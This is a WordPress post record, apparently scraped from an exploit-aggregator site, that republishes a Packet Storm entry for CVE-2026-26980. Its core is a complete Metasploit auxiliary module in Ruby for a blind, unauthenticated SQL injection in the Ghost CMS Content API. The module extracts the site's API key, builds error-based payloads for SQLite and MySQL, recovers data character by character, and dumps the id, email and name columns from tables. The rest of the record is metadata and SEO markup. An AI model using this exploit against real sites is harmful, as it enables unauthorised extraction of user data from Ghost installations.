{"id":48970,"date":"2026-04-23T12:50:27","date_gmt":"2026-04-23T12:50:27","guid":{"rendered":"http:\/\/localhost\/?p=48970"},"modified":"2026-04-23T12:50:27","modified_gmt":"2026-04-23T12:50:27","slug":"ghost-cms-6190-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=48970","title":{"rendered":"\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-23T16:46:53&#8243;,&#8221;description&#8221;:&#8221;This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API that affects versions 3.24.0 through 6.19.0&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219677&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-26980&#8243;],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n    | # Title     : Ghost CMS 6.19.0 Unauthenticated Content API Blind SQL Injection                                                 |\\n    | # Author    : indoushka                                                                                                        |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\\n    | # Vendor    : https:\/\/ghost.org\/                                                                                               |\\n    ==================================================================================================================================\\n    \\n    [+] Summary    : This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API (versions 3.24.0 to 6.19.0).\\n    \\n    \\n    [+] POC        :  \\n    \\n    ##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Auxiliary\\n      include Msf::Auxiliary::Report\\n      include Msf::Exploit::Remote::HttpClient\\n      include Msf::Auxiliary::Scanner\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;Ghost CMS Unauthenticated SQL Injection via Content API&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              Ghost CMS versions 3.24.0 through 6.19.0 contain an unauthenticated SQL injection\\n              vulnerability in the Content API.\\n            },\\n            &#8216;Author&#8217; =\\u003e [\\n              &#8216;indoushka&#8217;\\n            ],\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;CVE&#8217;, &#8216;2026-26980&#8217;]\\n            ],\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2026-03-30&#8217;\\n          )\\n        )\\n    \\n        register_options([\\n          OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path for Ghost installation&#8217;, &#8216;\/&#8217;]),\\n          OptString.new(&#8216;API_KEY&#8217;, [false, &#8216;Ghost Content API Key&#8217;, &#8221;]),\\n          OptString.new(&#8216;API_PATH&#8217;, [false, &#8216;Content API path&#8217;, &#8221;]),\\n          OptEnum.new(&#8216;DBMS&#8217;, [true, &#8216;Database engine&#8217;, &#8216;sqlite&#8217;, [&#8216;sqlite&#8217;, &#8216;mysql&#8217;]]),\\n          OptString.new(&#8216;TABLE&#8217;, [false, &#8216;Specific table&#8217;, &#8221;]),\\n          OptString.new(&#8216;COLUMNS&#8217;, [false, &#8216;Columns&#8217;, &#8221;]),\\n          OptInt.new(&#8216;THREADS&#8217;, [true, &#8216;Threads&#8217;, 15]),\\n          OptInt.new(&#8216;TIMEOUT&#8217;, [true, &#8216;Timeout&#8217;, 10])\\n        ])\\n      end\\n    \\n      def setup\\n        @base_uri = normalize_uri(target_uri.path)\\n        @api_key = datastore[&#8216;API_KEY&#8217;]\\n        @api_path = datastore[&#8216;API_PATH&#8217;]\\n        @dbms = datastore[&#8216;DBMS&#8217;]\\n        @threads = datastore[&#8216;THREADS&#8217;]\\n        @timeout = datastore[&#8216;TIMEOUT&#8217;]\\n        @table_to_dump = datastore[&#8216;TABLE&#8217;]\\n        @columns = datastore[&#8216;COLUMNS&#8217;]\\u0026.split(&#8216;,&#8217;)\\u0026.map(\\u0026:strip)\\n    \\n        @charset = \\&#8221;$.\/0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz@!#%^\\u0026*()+-=\\&#8221;.chars\\n        @error_indicator = \\&#8221;InternalServerError\\&#8221;\\n        @api_endpoint = nil\\n        @tag_slug = nil\\n        @tag_id = nil\\n        @url_template = nil\\n      end\\n    \\n      def run_host(ip)\\n        print_status(\\&#8221;Ghost SQLi CVE-2026-26980\\&#8221;)\\n        print_status(\\&#8221;Target: #{peer}\\&#8221;)\\n    \\n        unless discover_api_endpoint\\n          print_error(\\&#8221;Discovery failed\\&#8221;)\\n          return\\n        end\\n    \\n        unless verify_oracle\\n          print_error(\\&#8221;Oracle failed\\&#8221;)\\n          return\\n        end\\n    \\n        if @table_to_dump \\u0026\\u0026 !@table_to_dump.empty?\\n          dump_table(@table_to_dump)\\n        else\\n          perform_reconnaissance\\n        end\\n      end\\n    \\n      def discover_api_endpoint\\n        res = send_request_cgi({\\n          &#8216;uri&#8217; =\\u003e normalize_uri(@base_uri),\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;\\n        })\\n    \\n        return false unless res \\u0026\\u0026 res.code == 200\\n    \\n        if res.body =~ \/data-key=\\&#8221;([a-f0-9]+)\\&#8221;\/\\n          @api_key = Regexp.last_match(1)\\n        else\\n          return false\\n        end\\n    \\n        if res.body =~ \/data-api=\\&#8221;([^\\&#8221;]+)\\&#8221;\/\\n          api_raw = Regexp.last_match(1)\\n          path = URI.parse(api_raw).path\\n          @api_endpoint = normalize_uri(@base_uri, path)\\n          @api_endpoint = \\&#8221;#{@api_endpoint}\/\\&#8221;\\n        else\\n          return false\\n        end\\n    \\n        discover_tag_from_api\\n      end\\n    \\n      def discover_tag_from_api\\n        res = send_request_cgi({\\n          &#8216;uri&#8217; =\\u003e normalize_uri(@api_endpoint, &#8216;tags\/&#8217;),\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;vars_get&#8217; =\\u003e { &#8216;key&#8217; =\\u003e @api_key }\\n        })\\n    \\n        return false unless res \\u0026\\u0026 res.code == 200\\n    \\n        json = JSON.parse(res.body)\\n        return false unless json[&#8216;tags&#8217;] \\u0026\\u0026 json[&#8216;tags&#8217;][0]\\n    \\n        @tag_slug = json[&#8216;tags&#8217;][0][&#8216;slug&#8217;]\\n        @tag_id = json[&#8216;tags&#8217;][0][&#8216;id&#8217;]\\n    \\n        slug = Rex::Text.uri_encode(@tag_slug.to_s)\\n        @url_template = \\&#8221;#{@api_endpoint}tags\/?key=#{@api_key}\\u0026filter=slug:[&#8216;*&#8217;,#{slug}]\\u0026limit=all\\&#8221;\\n    \\n        true\\n      rescue\\n        false\\n      end\\n    \\n      def verify_oracle\\n        check_condition(\\&#8221;1=1\\&#8221;) \\u0026\\u0026 !check_condition(\\&#8221;1=2\\&#8221;)\\n      end\\n    \\n      def check_condition(condition)\\n        if @dbms == \\&#8221;mysql\\&#8221;\\n          error_payload = \\&#8221;(SELECT exp(710))\\&#8221;\\n        else\\n          error_payload = \\&#8221;(SELECT abs(-9223372036854775808))\\&#8221;\\n        end\\n    \\n        payload = \\&#8221; OR CASE WHEN (#{condition}) THEN #{error_payload} ELSE 0 END AND slug=\\&#8221;\\n        url = @url_template.gsub(\\&#8221;*\\&#8221;, payload, 1)\\n    \\n        res = send_request_cgi({\\n          &#8216;uri&#8217; =\\u003e url,\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;timeout&#8217; =\\u003e @timeout\\n        })\\n    \\n        return false unless res \\u0026\\u0026 res.body\\n    \\n        res.body =~ \/badrequesterror\/i || res.body =~ \/#{@error_indicator}\/i\\n      rescue\\n        false\\n      end\\n    \\n      def get_query_length(query)\\n        length = 0\\n        [64, 32, 16, 8, 4, 2, 1].each do |bit|\\n          if check_condition(\\&#8221;LENGTH((#{query}))\\u003e=#{length + bit}\\&#8221;)\\n            length += bit\\n          end\\n        end\\n        length\\n      end\\n    \\n      def get_query_char(query, position)\\n        low = 0\\n        high = @charset.length &#8211; 1\\n    \\n        while low \\u003c high\\n          mid = (low + high) \/ 2\\n          char_code = @charset[mid].ord\\n    \\n          condition = \\&#8221;ASCII(SUBSTR((#{query}),#{position},1))\\u003e=#{char_code}\\&#8221;\\n    \\n          if check_condition(condition)\\n            low = mid + 1\\n          else\\n            high = mid\\n          end\\n        end\\n    \\n        @charset[low]\\n      end\\n    \\n      def extract_data(query, label, force_length = nil)\\n        length = force_length || get_query_length(query)\\n        return \\&#8221;\\&#8221; if length.nil? || length.to_i \\u003c= 0\\n    \\n        result = []\\n        (1..length).each do |pos|\\n          result \\u003c\\u003c get_query_char(query, pos)\\n        end\\n    \\n        result.join\\n      end\\n    \\n      def dump_table(table_name)\\n        print_status(\\&#8221;Dumping: #{table_name}\\&#8221;)\\n    \\n        count = get_query_length(\\&#8221;SELECT COUNT(*) FROM #{table_name}\\&#8221;)\\n        return if count \\u003c= 0\\n    \\n        (0&#8230;count).each do |i|\\n          row = {}\\n          [&#8216;id&#8217;, &#8217;email&#8217;, &#8216;name&#8217;].each do |col|\\n            row[col] = extract_data(\\&#8221;SELECT #{col} FROM #{table_name} LIMIT 1 OFFSET #{i}\\&#8221;, col)\\n          end\\n        end\\n      end\\n    end\\n    \\t\\n    Greetings to :==============================================================================\\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n    ============================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/219677&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.4,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:L&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/219677\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-23T16:46:53&#8243;,&#8221;description&#8221;:&#8221;This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API that affects versions 3.24.0 through 6.19.0&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,13,53,7,11,5],"class_list":["post-48970","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=48970\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-23T16:46:53&#8243;,&#8221;description&#8221;:&#8221;This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API that affects versions 3.24.0 through 6.19.0&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=48970\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-23T12:50:27+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48970#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48970\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677\",\"datePublished\":\"2026-04-23T12:50:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48970\"},\"wordCount\":1112,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.4\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=48970#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48970\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48970\",\"name\":\"\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-23T12:50:27+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48970#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=48970\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48970#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=48970","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-23T16:46:53&#8243;,&#8221;description&#8221;:&#8221;This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API that affects versions 3.24.0 through 6.19.0&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4...","og_url":"https:\/\/zero.redgem.net\/?p=48970","og_site_name":"zero redgem","article_published_time":"2026-04-23T12:50:27+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=48970#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=48970"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677","datePublished":"2026-04-23T12:50:27+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=48970"},"wordCount":1112,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.4","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=48970#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=48970","url":"https:\/\/zero.redgem.net\/?p=48970","name":"\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-23T12:50:27+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=48970#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=48970"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=48970#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/48970","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=48970"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/48970\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=48970"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=48970"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=48970"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}